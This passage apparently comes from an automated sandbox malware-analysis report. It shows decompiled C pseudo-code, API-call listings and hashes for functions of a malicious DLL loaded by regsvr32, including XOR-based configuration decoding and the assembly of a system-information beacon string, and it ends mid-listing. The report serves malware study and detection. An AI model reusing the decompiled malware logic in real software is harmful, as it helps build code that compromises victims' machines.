                                                  • Instruction Fuzzy Hash: 0FF04F71C01219EFDB00EB94C58CAEDB7B8EF45308F1080AAE51263141D3B45B44CF75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8A66E, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00C8A66E(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E00C87323(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E00C89039(_a4);
				}
				return _t13;
			}





                                                  0x00c8a67a
                                                  0x00c8a67f
                                                  0x00c8a683
                                                  0x00c8a68a
                                                  0x00c8a695
                                                  0x00c8a699
                                                  0x00c8a699
                                                  0x00c8a6a2

                                                  APIs
                                                    • Part of subcall function 00C87323: memcpy.NTDLL(00000000,00000090,00000002,00000002,00C8685F,00000008,00C8685F,00C8685F,?,00C8858C,00C8685F), ref: 00C87359
                                                    • Part of subcall function 00C87323: memset.NTDLL ref: 00C873CF
                                                    • Part of subcall function 00C87323: memset.NTDLL ref: 00C873E3
                                                  • memcpy.NTDLL(00000002,00C8685F,00000000,00000002,00C8685F,00C8685F,00C8685F,?,00C8858C,00C8685F,?,00C8685F,00000002,?,?,00C82417), ref: 00C8A68A
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset$FreeHeap
                                                  • String ID:
                                                  • API String ID: 3053036209-0
                                                  • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction ID: 1a02da90c533b05735abf786cc430ec60f2f91bb0ed031fc69de8709825d1300
                                                  • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                  • Instruction Fuzzy Hash: 1BE08676404228B6C7123A94DC01EFF7F5DCF45795F044015FE084A101E631DA10B3EA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 00C84094, Relevance: 9.2, APIs: 6, Instructions: 223memoryCOMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E00C84094(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0xc8d278; // 0x63699bc3
				if(E00C88748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0xc8d2d4 = _v12;
				}
				_t25 =  *0xc8d278; // 0x63699bc3
				if(E00C88748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0xc8d278; // 0x63699bc3
						_t31 = E00C83F7C(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0xc8d240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0xc8d278; // 0x63699bc3
						_t32 = E00C83F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0xc8d244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0xc8d278; // 0x63699bc3
						_t33 = E00C83F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0xc8d248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0xc8d278; // 0x63699bc3
						_t34 = E00C83F7C(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0xc8d004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0xc8d278; // 0x63699bc3
						_t35 = E00C83F7C(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0xc8d02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0xc8d278; // 0x63699bc3
						_t36 = E00C83F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E00C86ED2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E00C8A5D6();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0xc8d278; // 0x63699bc3
						_t37 = E00C83F7C(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E00C86ED2(0, _t37) != 0) {
						_t102 =  *0xc8d32c; // 0x10a95b0
						E00C875E9(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0xc8d278; // 0x63699bc3
						_t38 = E00C83F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0xc8d27c; // 0x41a5a8
						_t18 = _t39 + 0xc8e252; // 0x616d692f
						 *0xc8d2d0 = _t18;
						goto L52;
					} else {
						_t49 = E00C86ED2(0, _t38);
						 *0xc8d2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0xc8d278; // 0x63699bc3
								_t41 = E00C83F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0xc8d27c; // 0x41a5a8
								_t19 = _t42 + 0xc8e791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E00C86ED2(0, _t41);
							}
							 *0xc8d340 = _t43;
							HeapFree( *0xc8d238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}


































                                                  0x00c84094
                                                  0x00c84097
                                                  0x00c840b7
                                                  0x00c840c5
                                                  0x00c840c5
                                                  0x00c840ca
                                                  0x00c840e4
                                                  0x00c842e2
                                                  0x00c842e4
                                                  0x00000000
                                                  0x00c840ea
                                                  0x00c840ea
                                                  0x00c840f1
                                                  0x00c84107
                                                  0x00c840f3
                                                  0x00c840f3
                                                  0x00c84100
                                                  0x00c84100
                                                  0x00c84111
                                                  0x00c84113
                                                  0x00c8411d
                                                  0x00c84122
                                                  0x00c84122
                                                  0x00c8411d
                                                  0x00c84129
                                                  0x00c8413f
                                                  0x00c8412b
                                                  0x00c8412b
                                                  0x00c84138
                                                  0x00c84138
                                                  0x00c84143
                                                  0x00c84145
                                                  0x00c8414f
                                                  0x00c84154
                                                  0x00c84154
                                                  0x00c8414f
                                                  0x00c8415b
                                                  0x00c84171
                                                  0x00c8415d
                                                  0x00c8415d
                                                  0x00c8416a
                                                  0x00c8416a
                                                  0x00c84175
                                                  0x00c84177
                                                  0x00c84181
                                                  0x00c84186
                                                  0x00c84186
                                                  0x00c84181
                                                  0x00c8418d
                                                  0x00c841a3
                                                  0x00c8418f
                                                  0x00c8418f
                                                  0x00c8419c
                                                  0x00c8419c
                                                  0x00c841a7
                                                  0x00c841a9
                                                  0x00c841b3
                                                  0x00c841b8
                                                  0x00c841b8
                                                  0x00c841b3
                                                  0x00c841bf
                                                  0x00c841d5
                                                  0x00c841c1
                                                  0x00c841c1
                                                  0x00c841ce
                                                  0x00c841ce
                                                  0x00c841d9
                                                  0x00c841db
                                                  0x00c841e5
                                                  0x00c841ea
                                                  0x00c841ea
                                                  0x00c841e5
                                                  0x00c841f1
                                                  0x00c84207
                                                  0x00c841f3
                                                  0x00c841f3
                                                  0x00c84200
                                                  0x00c84200
                                                  0x00c8420b
                                                  0x00c8420d
                                                  0x00c84210
                                                  0x00c84211
                                                  0x00c84218
                                                  0x00c8421a
                                                  0x00c8421b
                                                  0x00c8421b
                                                  0x00c84218
                                                  0x00c84222
                                                  0x00c84238
                                                  0x00c84224
                                                  0x00c84224
                                                  0x00c84231
                                                  0x00c84231
                                                  0x00c8423c
                                                  0x00c8424a
                                                  0x00c84254
                                                  0x00c84254
                                                  0x00c8425b
                                                  0x00c84271
                                                  0x00c8425d
                                                  0x00c8425d
                                                  0x00c8426a
                                                  0x00c8426a
                                                  0x00c84275
                                                  0x00c84288
                                                  0x00c84288
                                                  0x00c8428d
                                                  0x00c84293
                                                  0x00000000
                                                  0x00c84277
                                                  0x00c8427a
                                                  0x00c84281
                                                  0x00c84286
                                                  0x00c84298
                                                  0x00c8429a
                                                  0x00c842b0
                                                  0x00c8429c
                                                  0x00c8429c
                                                  0x00c842a9
                                                  0x00c842a9
                                                  0x00c842b4
                                                  0x00c842c0
                                                  0x00c842c5
                                                  0x00c842c5
                                                  0x00c842b6
                                                  0x00c842b9
                                                  0x00c842b9
                                                  0x00c842d3
                                                  0x00c842d8
                                                  0x00c842e5
                                                  0x00c842e9
                                                  0x00c842e9
                                                  0x00000000
                                                  0x00c84286
                                                  0x00c84275

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C84119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C8414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C8417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C841AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C841E1
                                                  • HeapFree.KERNEL32(00000000,00C823DE,00C823DE,?,63699BC3,00C823DE,?,63699BC3,00000005,00C8D00C,00000008,?,00C823DE), ref: 00C842D8
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 9023bf63f34e771c626b5322fdceb4c6a7e53c88f755fe05e8a6cefbf2426461
                                                  • Instruction ID: d22fbcf1a6510846ba815983c56fc7d2954f5a656472f9f169d01a16546ca3d5
                                                  • Opcode Fuzzy Hash: 9023bf63f34e771c626b5322fdceb4c6a7e53c88f755fe05e8a6cefbf2426461
                                                  • Instruction Fuzzy Hash: 6A61C5B0A14106AADB24FBF8DC88F5F77ED9B587187244A25F512D3255E730DE80972C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8A279, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 66%
                                                  			E00C8A279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0xc8d018; // 0xf56cfa1f
				asm("bswap eax");
				_t27 =  *0xc8d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0xc8d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0xc8d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0xc8d27c; // 0x41a5a8
				_t3 = _t30 + 0xc8e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0xc8d02c,  *0xc8d004, _t25);
				_t33 = E00C81C1A();
				_t34 =  *0xc8d27c; // 0x41a5a8
				_t4 = _t34 + 0xc8e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E00C854BC(_t91);
				if(_t96 != 0) {
					_t83 =  *0xc8d27c; // 0x41a5a8
					_t6 = _t83 + 0xc8e8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0xc8d238, 0, _t96);
				}
				_t97 = E00C87649();
				if(_t97 != 0) {
					_t78 =  *0xc8d27c; // 0x41a5a8
					_t8 = _t78 + 0xc8e8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0xc8d238, 0, _t97);
				}
				_t98 =  *0xc8d32c; // 0x10a95b0
				_a32 = E00C89395(0xc8d00a, _t98 + 4);
				_t42 =  *0xc8d2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0xc8d27c; // 0x41a5a8
					_t11 = _t74 + 0xc8e8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0xc8d2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0xc8d27c; // 0x41a5a8
					_t13 = _t71 + 0xc8e8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0xc8d238, 0, 0x800);
					if(_t100 != 0) {
						E00C87A80(GetTickCount());
						_t50 =  *0xc8d32c; // 0x10a95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0xc8d32c; // 0x10a95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0xc8d32c; // 0x10a95b0
						_t103 = E00C88307(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0xc8c2ac);
							_push(_t103);
							_t62 = E00C83CC8();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E00C81199(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E00C8A1B0();
								}
								HeapFree( *0xc8d238, 0, _v44);
							}
							HeapFree( *0xc8d238, 0, _t103);
						}
						HeapFree( *0xc8d238, 0, _t100);
					}
					HeapFree( *0xc8d238, 0, _a24);
				}
				HeapFree( *0xc8d238, 0, _t105);
				return _a12;
			}
















































                                                  0x00c8a279
                                                  0x00c8a279
                                                  0x00c8a279
                                                  0x00c8a280
                                                  0x00c8a286
                                                  0x00c8a28e
                                                  0x00c8a290
                                                  0x00c8a290
                                                  0x00c8a29d
                                                  0x00c8a2a8
                                                  0x00c8a2ab
                                                  0x00c8a2b6
                                                  0x00c8a2b9
                                                  0x00c8a2be
                                                  0x00c8a2c1
                                                  0x00c8a2c6
                                                  0x00c8a2c9
                                                  0x00c8a2d5
                                                  0x00c8a2e2
                                                  0x00c8a2e4
                                                  0x00c8a2ea
                                                  0x00c8a2ef
                                                  0x00c8a2fa
                                                  0x00c8a2fc
                                                  0x00c8a2ff
                                                  0x00c8a306
                                                  0x00c8a30a
                                                  0x00c8a30c
                                                  0x00c8a311
                                                  0x00c8a31d
                                                  0x00c8a31f
                                                  0x00c8a32b
                                                  0x00c8a32d
                                                  0x00c8a32d
                                                  0x00c8a338
                                                  0x00c8a33c
                                                  0x00c8a33e
                                                  0x00c8a343
                                                  0x00c8a34f
                                                  0x00c8a351
                                                  0x00c8a35d
                                                  0x00c8a35f
                                                  0x00c8a35f
                                                  0x00c8a365
                                                  0x00c8a378
                                                  0x00c8a37c
                                                  0x00c8a383
                                                  0x00c8a386
                                                  0x00c8a38b
                                                  0x00c8a396
                                                  0x00c8a398
                                                  0x00c8a39b
                                                  0x00c8a39b
                                                  0x00c8a39d
                                                  0x00c8a3a4
                                                  0x00c8a3a7
                                                  0x00c8a3ac
                                                  0x00c8a3b6
                                                  0x00c8a3b8
                                                  0x00c8a3c0
                                                  0x00c8a3d9
                                                  0x00c8a3dd
                                                  0x00c8a3e9
                                                  0x00c8a3ee
                                                  0x00c8a3f7
                                                  0x00c8a408
                                                  0x00c8a40c
                                                  0x00c8a415
                                                  0x00c8a41b
                                                  0x00c8a428
                                                  0x00c8a435
                                                  0x00c8a43b
                                                  0x00c8a447
                                                  0x00c8a44d
                                                  0x00c8a44e
                                                  0x00c8a455
                                                  0x00c8a459
                                                  0x00c8a45f
                                                  0x00c8a466
                                                  0x00c8a46d
                                                  0x00c8a473
                                                  0x00c8a47a
                                                  0x00c8a47e
                                                  0x00c8a489
                                                  0x00c8a490
                                                  0x00c8a494
                                                  0x00c8a49d
                                                  0x00c8a49d
                                                  0x00c8a4ae
                                                  0x00c8a4ae
                                                  0x00c8a4bd
                                                  0x00c8a4bd
                                                  0x00c8a4cc
                                                  0x00c8a4cc
                                                  0x00c8a4de
                                                  0x00c8a4de
                                                  0x00c8a4ed
                                                  0x00c8a4fe

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00C8A290
                                                  • wsprintfA.USER32 ref: 00C8A2DD
                                                  • wsprintfA.USER32 ref: 00C8A2FA
                                                  • wsprintfA.USER32 ref: 00C8A31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00C8A32D
                                                  • wsprintfA.USER32 ref: 00C8A34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00C8A35F
                                                  • wsprintfA.USER32 ref: 00C8A396
                                                  • wsprintfA.USER32 ref: 00C8A3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00C8A3D3
                                                  • GetTickCount.KERNEL32 ref: 00C8A3E3
                                                  • RtlEnterCriticalSection.NTDLL(010A9570), ref: 00C8A3F7
                                                  • RtlLeaveCriticalSection.NTDLL(010A9570), ref: 00C8A415
                                                    • Part of subcall function 00C88307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,00C8A428,?,010A95B0), ref: 00C88332
                                                    • Part of subcall function 00C88307: lstrlen.KERNEL32(?,?,?,00C8A428,?,010A95B0), ref: 00C8833A
                                                    • Part of subcall function 00C88307: strcpy.NTDLL ref: 00C88351
                                                    • Part of subcall function 00C88307: lstrcat.KERNEL32(00000000,?), ref: 00C8835C
                                                    • Part of subcall function 00C88307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00C8A428,?,010A95B0), ref: 00C88379
                                                  • StrTrimA.SHLWAPI(00000000,00C8C2AC,?,010A95B0), ref: 00C8A447
                                                    • Part of subcall function 00C83CC8: lstrlen.KERNEL32(010A87FA,00000000,00000000,74ECC740,00C8A453,00000000), ref: 00C83CD8
                                                    • Part of subcall function 00C83CC8: lstrlen.KERNEL32(?), ref: 00C83CE0
                                                    • Part of subcall function 00C83CC8: lstrcpy.KERNEL32(00000000,010A87FA), ref: 00C83CF4
                                                    • Part of subcall function 00C83CC8: lstrcat.KERNEL32(00000000,?), ref: 00C83CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 00C8A466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00C8A46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00C8A47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00C8A47E
                                                    • Part of subcall function 00C81199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 00C8124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00C8A4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00C8A4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,010A95B0), ref: 00C8A4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 00C8A4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 00C8A4ED
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID:
                                                  • API String ID: 3080378247-0
                                                  • Opcode ID: fb0385cb994880977013de2833c25e321672ade0fcc04759ade0839cbfa7f5ff
                                                  • Instruction ID: dbdbfe1499be6b30f8619ade750c39044ec939d90f1f08d2132f6a9fe2718b3a
                                                  • Opcode Fuzzy Hash: fb0385cb994880977013de2833c25e321672ade0fcc04759ade0839cbfa7f5ff
                                                  • Instruction Fuzzy Hash: 2E61AC71500200EFD721AB68EC88F5E7BE8EB48754F054125F90AD72B1DB35ED06AB6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00C8ADE5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 51%
                                                  			E00C8ADE5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0xc80000;
				_t115 = _t139[3] + 0xc80000;
				_t131 = _t139[4] + 0xc80000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0xc80000;
				_v16 = _t139[5] + 0xc80000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0xc80002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0xc8d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0xc8d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0xc8d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0xc8d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0xc8d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0xc8d198; // 0x0
										 *_t102 = _t125;
										 *0xc8d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0xc8d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                                  0x00c8adf4
                                                  0x00c8ae0a
                                                  0x00c8ae10
                                                  0x00c8ae12
                                                  0x00c8ae17
                                                  0x00c8ae1d
                                                  0x00c8ae22
                                                  0x00c8ae25
                                                  0x00c8ae33
                                                  0x00c8ae3a
                                                  0x00c8ae3d
                                                  0x00c8ae40
                                                  0x00c8ae41
                                                  0x00c8ae44
                                                  0x00c8ae47
                                                  0x00c8ae4a
                                                  0x00c8ae4f
                                                  0x00c8ae5e
                                                  0x00000000
                                                  0x00c8ae64
                                                  0x00c8ae6e
                                                  0x00c8ae78
                                                  0x00c8ae7d
                                                  0x00c8ae7f
                                                  0x00c8ae89
                                                  0x00c8ae8c
                                                  0x00c8ae8f
                                                  0x00c8ae95
                                                  0x00c8ae97
                                                  0x00c8ae97
                                                  0x00c8ae9a
                                                  0x00c8ae9d
                                                  0x00c8aea2
                                                  0x00c8aea6
                                                  0x00c8aeb9
                                                  0x00c8aebb
                                                  0x00c8af63
                                                  0x00c8af63
                                                  0x00c8af6a
